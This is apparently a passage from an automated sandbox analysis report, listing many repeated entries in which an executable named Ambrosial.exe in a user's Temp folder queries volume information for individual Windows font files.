              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
